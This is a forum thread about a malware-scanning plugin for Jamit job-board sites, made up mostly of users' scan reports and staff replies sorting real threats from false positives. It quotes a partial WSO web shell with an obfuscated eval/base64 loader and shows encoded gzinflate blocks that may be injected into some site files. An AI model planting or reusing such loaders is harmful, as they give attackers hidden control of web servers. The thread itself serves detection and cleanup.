Jamit Software Forum

Just released the security tools plugin today. Available to download from http://www.jamit.com/plugins/SecurityTools.zip

Description: Recently, there has been an alarming increase in the number
of websites infected with malware. Your computer can be infected in seconds
just by visiting a malware infected site - even if you
have the latest anti-virus and upgrades installed.
A site infected with malware is then used to infect your site's visitors.
Once the malware is present on a desktop machine, it is able to steal FTP
passwords / login details and use these details to gain unauthorized access
to infect more sites.

This plugin scans your job board installation, and attempts
to hunt down the infections based on a few common signatures that we found
from analyzing a number of infected sites. The plugin scans PHP files
to find any unusual PHP code, and it is also able to scan some of the job
board's directories to hunt for files out of place.

Be aware, the scanner may report some false-positives.

Available to download from http://www.jamit.com/plugins/SecurityTools.zip

See README.txt for installation details.

Excellent plugin.

Nice to see Jamit take more step towards security features of the script and the site.

I have installed it and tested it. Works great.

Thanks to Adam.

Thanks,
BV.

Thanks for this. I have just completed installing and running the Security Tools Plugin. Seems to work very well and is very easy to use.

Firstly, a suggestion. Would it be possible to exclude certain folders when performing a scan? My initial scan returned a lot of "results" which were all related to other folders (ie openx, forum, etc).

Scan returned all non job board results.

Hunt returned one issue namely: 9340_tatto1247227692.mp3
However, when trying to locate this file, it is not visible from within my ftp client. The file is meant to be located in the "upload_files/docs" folder but all files in this folder start with 1, 2, 3 or 4.

I find I file with SCAN file: wso22.php

content is:
<?php
/**
 * WSO 2
 * Web Shell by oRb
 */
$auth = array(
   'md5pass' => "63a9f0ea7bb98050796b649e85481845" // root
);
$color = "#df5";
@define('SELF_PATH', __FILE__);
eval(gzinflate(base64_decode('7X1rV9tKsuhnzlrnP3Q0nC17xxjbQCYxGMIbEkIIj5AHuRxZkm0F2dKWZAzJ8N9vVfVDLVk2Jtln7r1r3Zm1g9VdXV39qq6urqr2OiUWJ1EYxKX567Pd04+7p1/Ng/Pzk+sL+Lre3N89Pje/Vcz9IOj6rllmz1ot1rH82GVl9vM//2Ou51qOG5WozGK9WmPLtWV2HCRsLxgOHLO8CjDunZfA34f.....

was in public_html directory and when I open on the browser, jus ask for a password. Now I delated.

Rutulo,

That's definitely malicious code. I admire you that you dared to view it in your browser.

Hi,
First thank you for this much needed security tool.....

I installed it and run it on my JB and i got the following warning message

Possibly bad code (execution of a shell command) /public_html/include/edit_config.php on line 909:
@exec ("w", $out);

any suggestions?

Regards,
Amjad

wso22.php - definitely a back-door & should be deleted.
Mp3 files should be safe - its a bug that the plugin flags them, it will be fixed for the next revision.
@exec ("w", $out); - it is totally safe, I'll put on the white list for the next version.
Thanks for reporting!

Amjad - your edit_config.php file is in the wrong directory, it should not be in include/ but in admin/, please delete it from include/

Done
Thnx Adam

Ok security tool works fine, nothing unsual code found. How often I must run the scan?

Thanks
-Thorsten

guys this scares me - it shows 167 threats on my job board MbaNaukri.com - (users have sometimes complained when they try to visit site it says like "Urgent notice your website MBA naukri has been infected with trojan Virus. People having Kaspersky installed in their system cannot search your website after initial login")

have attached the results given by the plugin, plz help

Thanks Adam!

Found a file:  class.php
line 36: 
$mess64 = base64_decode($_POST['message']);

Another:

adw.php
line 40: $mess64 = base64_decode($_POST['message']);

Delete?

Found another:

edit_config.php on line 909:
@exec ("w", $out);

Advice on this one? 

Found these on yet another domain:

include/functions2.php on line 231:
$make_magick = exec($command, $retval);

include/functions2.php on line 1701:
exec ("w", $out);

include/edit_config.php on line 909:
@exec ("w", $out);

cache/cat_f4_c0_cache.inc.php on line 2:
$category_table = unserialize('a:2:{s:2:"EN";a:3:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}s:2:"ES";a:3:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}}');

Phil:

These look like they are our files, but in the wrong place. They can be deleted:

include/functions2.php on line 231:
$make_magick = exec($command, $retval);

include/functions2.php on line 1701:
exec ("w", $out);

include/edit_config.php on line 909:
@exec ("w", $out);



The files class.php and adw.php are not from our software. If not in use by other software on your server, then they should be deleted ASAP and also change your FTP passwords.

Received the below when using Scan File command:

Possibly bad code in (command execution) /home/cityjobb/public_html/mywaterplantjobs/cache/cat_f4_c0_cache.inc.php on line 2:

$category_table = unserialize('a:2:{s:2:"EN";a:6:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"707";s:4:"cpid";s:1:"0";s:1:"n";s:21:"Public Utility (City)";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:3;a:7:{s:3:"cid";s:3:"708";s:4:"cpid";s:1:"0";s:1:"n";s:30:"Public Utility (County/Parish)";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:4;a:7:{s:3:"cid";s:3:"709";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water - Sewer District";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:5;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}s:2:"ES";a:6:{i:0;a:7:{s:3:"cid";s:3:"703";s:4:"cpid";s:1:"0";s:1:"n";s:15:"Consulting Firm";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:1;a:7:{s:3:"cid";s:3:"702";s:4:"cpid";s:1:"0";s:1:"n";s:24:"Private System Operator ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:2;a:7:{s:3:"cid";s:3:"707";s:4:"cpid";s:1:"0";s:1:"n";s:21:"Public Utility (City)";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:3;a:7:{s:3:"cid";s:3:"708";s:4:"cpid";s:1:"0";s:1:"n";s:30:"Public Utility (County/Parish)";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:4;a:7:{s:3:"cid";s:3:"709";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water - Sewer District";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}i:5;a:7:{s:3:"cid";s:3:"701";s:4:"cpid";s:1:"0";s:1:"n";s:22:"Water System (Public) ";s:2:"oc";s:1:"0";s:2:"ch";a:0:{}s:3:"chc";i:0;s:3:"seo";N;}}}');

Phil, that looks like a false alarm. Do not worry about that one.

Found these results in a scan recently:  This came from a site which is not up and running yet but had 4 new users logged in with ip addresses from amsterdam; not my favorite source of users 

Possibly bad code (Common way of hiding malicious code) in /home/cityjobb/public_html/mywaterplantjobs.biz/include/plugins/NAS_TrafficTracker/NAS_TrafficTracker/NAS_TrafficTracker.php on line 45:
$this->config[$nas_prefix.'tracking_code'] = base64_decode($this->config[$nas_prefix.'tracking_code']);
Possibly bad code (Common way of hiding malicious code) in /home/cityjobb/public_html/mywaterplantjobs.biz/include/plugins/NAS_TrafficTracker/NAS_TrafficTracker/NAS_TrafficTracker.php on line 210:
$_REQUEST[$nas_prefix.'tracking_code'] = base64_decode($_REQUEST[$nas_prefix.'tracking_code']);

If you use the SECURITY TOOLS plugin to scan your server and you see this, don't worry. This is NOT any threat.

Security Tools 2.0 released today!
Updates the white-list, improves the code scanner and also adds an automatic scan feature.
Free download (for Jamit customers)
Go to: http://market.jamit.com/item/security-tools/2010-08-03/23

Wow,

happy to see this tool, more importantly the forum. Because I apparently got infected. What's interesting is when I visit my site "dadaal.com (http://dadaal.com)", it loads fine...just jumps to end of page just before it finishes loading.

Some friends have complained that that it loads than redirects real quick some some russian search site!!!

So after downloading the security tool...this is what i got. Ugh.
Any advice is welcome, and I'm a beginner all things css/html so please break it down.

Much obliged.
Ps: I have Kaspersky.

I've attached the Security Tool Report in Notepad format to this posting.

Read this

http://forum.jamit.com/index.php?topic=577.0

It may help

Regards lee

Greetings,
Just to let you know that the Security Tools plugin was updated. It adds some more signatures, and has a new feature which will scan the job board daily and email a report if anything new is detected. Grab it from the market http://market.jamit.com/

Adam

Just installed it - traffic cop (latest version) seems to be triggering a bunch of security alerts. Since my site is in beta and password-protected - I'd be shocked if any of these warnings were real. I think I'm going to treat this as a baseline false-positive and go from there.

Possibly bad code (Common way of hiding malicious code) in /home/workinh/workinhealth.ca/include/plugins/TrafficCop/TrafficCop.php on line 135:
$this->config['ua_invstr'] = base64_decode($this->config['ua_invstr']); // string
Possibly bad code (Common way of hiding malicious code) in /home/workinh/workinhealth.ca/include/plugins/TrafficCop/TrafficCop.php on line 2833:
$this->config['ua_invstr'] = base64_decode($_REQUEST['ua_invstr']);
Possibly bad code (Common way of hiding malicious code) in /home/workinh/workinhealth.ca/include/plugins/TrafficCop/general_settings.php on line 221:
$_REQUEST['ua_invstr'] = base64_decode($_REQUEST['ua_invstr']);
Possibly bad code (execution of a shell command) /home/workinh/workinhealth.ca/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/workinh/workinhealth.ca/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/workinh/workinhealth.ca/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null
Found 6 threats. Some may be false-positives. Please discuss this on the forum
---------------------------------
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/dns-aaf1cb2102de05d120d2dc6f789b5bbb.txt
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/dns-b535ae0297243fd610c6c11276d888a8.txt
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/tcop-stats-56ae6db8b06280f612f2572a99012f3c.txt
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/tcop-purge-56ae6db8b06280f612f2572a99012f3c.txt
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/dns-f228a08ad1110dd5ddde4d14b72f51fe.txt

The files starting with "dns-....." are the DNS cache files written by Traffic Cop.

The files starting with "tcop-stats-......" and "tcop-purge-....." are also written by Traffic Cop.

All of these I described are not any threat.

No worries, mate! This is correct and there is no threat!

I get 12 alerts with the scan - but my site is in beta and locked to anyone but me accessing it, so I'm assuming that they are false alarms. TrafficCop plugin generates a few, as does something in include/lib/scw and the cache.

Any thoughts on how to handle them - ie ignore it or is there some way to whitelist these alerts?

Possibly bad code (Common way of hiding malicious code) in /home/workinh/workinhealth.ca/include/plugins/TrafficCop/TrafficCop.php on line 135:
$this->config['ua_invstr'] = base64_decode($this->config['ua_invstr']); // string
Possibly bad code (Common way of hiding malicious code) in /home/workinh/workinhealth.ca/include/plugins/TrafficCop/TrafficCop.php on line 2833:
$this->config['ua_invstr'] = base64_decode($_REQUEST['ua_invstr']);
Possibly bad code (Common way of hiding malicious code) in /home/workinh/workinhealth.ca/include/plugins/TrafficCop/general_settings.php on line 221:
$_REQUEST['ua_invstr'] = base64_decode($_REQUEST['ua_invstr']);
Possibly bad code (execution of a shell command) /home/workinh/workinhealth.ca/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/workinh/workinhealth.ca/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/workinh/workinhealth.ca/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null
Found 6 threats. Some may be false-positives. Please discuss this on the forum
---------------------------------
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/dns-aaf1cb2102de05d120d2dc6f789b5bbb.txt
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/dns-83c4d13df7b1fa7949305b483273ca5a.txt
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/tcop-stats-56ae6db8b06280f612f2572a99012f3c.txt
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/dns-7ed251c8c745055be49d1c8e02e89638.txt
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/tcop-purge-56ae6db8b06280f612f2572a99012f3c.txt
Possibly a rogue php file: /home/workinh/workinhealth.ca/cache/dns-5eef6aab6ea341d2005113fde1e9021d.txt

Regan, please see my earlier reply that also applies to your situation regarding some items found by the Security Tools plugin.

Hi Peter,

I get exactly the same problem as Regan and although there is no risk, they are quite annoying especially the one that lists the cache files as it seems to get longer each time. Is there no way of fixing this or is it something that will be fixed in the next version?

Jamit: 3.6.8
Traffic Cop: 4.37

Cheers,

Chris.

Happy New Year all!   :-*

After a lot of work on my part, my site at http://www.nightowlstaffing.com (http://www.nightowlstaffing.com) was ranking very high on Google searches until around Dec. 30th 2010.  Suddenly it's not listed anywhere when searching for "2nd shift jobs" or "3rd shift jobs" (those used to be high ranking on the first page).  I suspected maybe the site was hacked but now I'm not sure.  I installed the latest version of Security Tools v2.1 (thanks for the program Adam!) and I got the results below.  Most of them are from my associated WordPress blog at http://www.nightowlstaffing.com/jobblog (http://www.nightowlstaffing.com/jobblog)  If Peter, Adam or anyone has time to review these and let me know if they are real threats and what I should do next I would really appreciate it!

Thanks  in advance!

Dennis

Possibly bad code (execution of a shell command) /home/nightowl/public_html/testweb/locate_convert.php on line 5:
$retval = system ("locate convert");
Possibly bad code in (command execution) /home/nightowl/public_html/testweb/locate_convert.php on line 5:
$retval = system ("locate convert");
Possibly bad code (execution of a shell command) /home/nightowl/public_html/admin/suggest_permissions.php on line 118:
exec ('ls -o '.$temp, $output);
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-content/plugins/pretty-link/classes/models/PrliUpdate.php on line 228:
return base64_decode($client->getResponse());
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/theme.php on line 68:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/class-pclzip.php on line 3222:
// extracted in the filesystem (extract).
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 514:
* Assumes that WP_Filesystem() has already been called and set up. Does not extract a root-level __MACOSX directory, if present.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 570:
* Assumes that WP_Filesystem() has already been called and set up.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 652:
* Assumes that WP_Filesystem() has already been called and set up.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 724:
* Assumes that WP_Filesystem() has already been called and setup.
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/file.php on line 774:
function WP_Filesystem( $args = false, $context = false ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/plugin.php on line 625:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/includes/class-wp-upgrader.php on line 70:
if ( ! WP_Filesystem($credentials) ) {
Possibly bad code in (command execution) /home/nightowl/public_html/jobblog/wp-admin/update-core.php on line 317:
if ( ! WP_Filesystem($credentials, ABSPATH) ) {
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-app.php on line 1457:
explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION'], 6)));
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-app.php on line 1462:
explode(':', base64_decode(substr($_SERVER['REDIRECT_REMOTE_USER'], 6)));
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/class-phpmailer.php on line 438:
if(!@$mail = popen($sendmail, 'w')) {
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 263:
define('SIMPLEPIE_PCRE_HTML_ATTRIBUTE', '((?:[\x09\x0A\x0B\x0C\x0D\x20]+[^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?)*)[\x09\x0A\x0B\x0C\x0D\x20]*');
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 9183:
if (isset($matches[$i][2][0]) && preg_match_all('/[\x09\x0A\x0B\x0C\x0D\x20]+([^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3D\x3E]*)(?:[\x09\x0A\x0B\x0C\x0D\x20]*=[\x09\x0A\x0B\x0C\x0D\x20]*(?:"([^"]*)"|\'([^\']*)\'|([^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?/', ' ' . $matches[$i][2][0] . ' ', $attribs, PREG_SET_ORDER))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 10775:
$curl = substr($curl, 5, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", 5));
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 10779:
$curl = substr($curl, 8, strcspn($curl, "\x09\x0A\x0B\x0C\x0D", 8));
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11048:
$space_characters = "\x20\x09\x0A\x0B\x0C\x0D";
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11255:
elseif (substr($data, 0, 20) === "\x00\x00\x00\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11257:
if ($pos = strpos($data, "\x00\x00\x00\x3F\x00\x00\x00\x3E"))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11268:
elseif (substr($data, 0, 20) === "\x3C\x00\x00\x00\x3F\x00\x00\x00\x78\x00\x00\x00\x6D\x00\x00\x00\x6C\x00\x00\x00")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11270:
if ($pos = strpos($data, "\x3F\x00\x00\x00\x3E\x00\x00\x00"))
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11281:
elseif (substr($data, 0, 10) === "\x00\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11294:
elseif (substr($data, 0, 10) === "\x3C\x00\x3F\x00\x78\x00\x6D\x00\x6C\x00")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 11307:
elseif (substr($data, 0, 5) === "\x3C\x3F\x78\x6D\x6C")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13583:
$ws = strspn($this->file->body, "\x09\x0A\x0B\x0C\x0D\x20");
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13603:
elseif (substr($this->file->body, 0, 8) === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 13634:
elseif (substr($this->file->body, 0, 8) === "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A")
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14820:
if (preg_match('/(&(#(x[0-9a-fA-F]+|[0-9]+)|[a-zA-Z0-9]+)|<\/[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>)/', $data))
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14832:
$data = base64_decode($data);
Dangerous file! (Shell Code / disguised code) /home/nightowl/public_html/jobblog/wp-includes/class-simplepie.php on line 14875:
$data = preg_replace('/(<[A-Za-z][^\x09\x0A\x0B\x0C\x0D\x20\x2F\x3E]*)' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . trim($attrib) . '(?:\s*=\s*(?:"(?:[^"]*)"|\'(?:[^\']*)\'|(?:[^\x09\x0A\x0B\x0C\x0D\x20\x22\x27\x3E][^\x09\x0A\x0B\x0C\x0D\x20\x3E]*)?))?' . SIMPLEPIE_PCRE_HTML_ATTRIBUTE . '>/', '\1\2\3>', $data);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/class-snoopy.php on line 1015:
exec($this->curl_path." -k -D \"$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/Text/Diff/Engine/shell.php on line 50:
$diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);
Possibly bad code (Common way of hiding malicious code) in /home/nightowl/public_html/jobblog/wp-includes/class-IXR.php on line 249:
$value = base64_decode( trim( $this->_currentTagContents ) );
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php on line 31:
$data = shell_exec($cmd);
Possibly bad code (execution of a shell command) /home/nightowl/public_html/jobblog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php on line 75:
$data = shell_exec($cmd);

Annoying? They are only cache files that Traffic Cop creates in order to speed up operation. There is nothing that I can do other than telling to Adam and he might make the Security Tools plugin ignore these cache files.

I am sure that the list of "possible threats" will never be empty, with new plugins being introduced and old plugins being revised constantly. You will still need to rely on your own judgment to some extent.

OK, thanks for the reply. Excellent plugin by the way, when you look at the deny log it makes you realise to how many threats are out there, keep up the good work!

Has anyone had a chance to check my errors above?   ???

Thanks in advance!

Dennis

Hi Dennis,
Thanks for posting! The results seems ok, it looks like a lot of false-positives in Wordpress...I may need to adjust the plugin for these
You can also check Google Webmaster tools, they also provide report if any malware has been detected on your site.
Adam

Adam - thanks for your response!   :)

Just an FYI - my Google rankings are suddenly back where they were before with no intervention on my part.  Must have been a Google Thing.  Nice.    ::)

Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) xxxxxxxxxxxxxxxxxxxxxxxxxxx/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null


can you help me???  :o

Rutulo,

No problem! That's just the JavaScript code and there is nothing wrong with it!  :)

Thank's Peter!  ;)

I just installed Jamit and a whole bunch of plugins, just got this security report,

Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 976:
if (scwExpValYear.exec(scwArrSeed[0]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 977:
scwExpValMonth.exec(scwArrSeed[1]) == null ||
Possibly bad code (execution of a shell command) /home/youhire1/public_html/include/lib/scw/scw_js_with_comments.php on line 978:
scwExpValDay.exec(scwArrSeed[2]) == null
Found 3 threats. Some may be false-positives. Please discuss this on the forum
---------------------------------
Possibly a rogue php file: /home/youhire1/public_html/cache/e4fe98bfc2jarfile.txt
Found 1 rogue files. Some may be false-positives

Any feedback, also wondering if I could get a general checkup on my site, I'm unexperienced just followed a bunch of tutorials, after paying someone thousands of dollars to do it for me a few years ago, only to end up with an unlicensed version, so I bought a license and did it myself

www.youhireme.com

Hi, if you look about 2 messages up, you will see my earlier comment that those scw_js... files are OK.

HI, Just ran the SCan PHP Files via the Security Tools. Informed to post to this forum (13 threats). can anyone offer any input/advice? Thanks in advance.

Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/lang/english_default.php on line 1434:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/index.php on line 7:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/myjobs/login.php on line 22:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/main.php on line 157:
 echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
 Possibly bad code (Common way of hiding malicious code) in /home/jobsb73/public_html/employers/index.php on line 15:
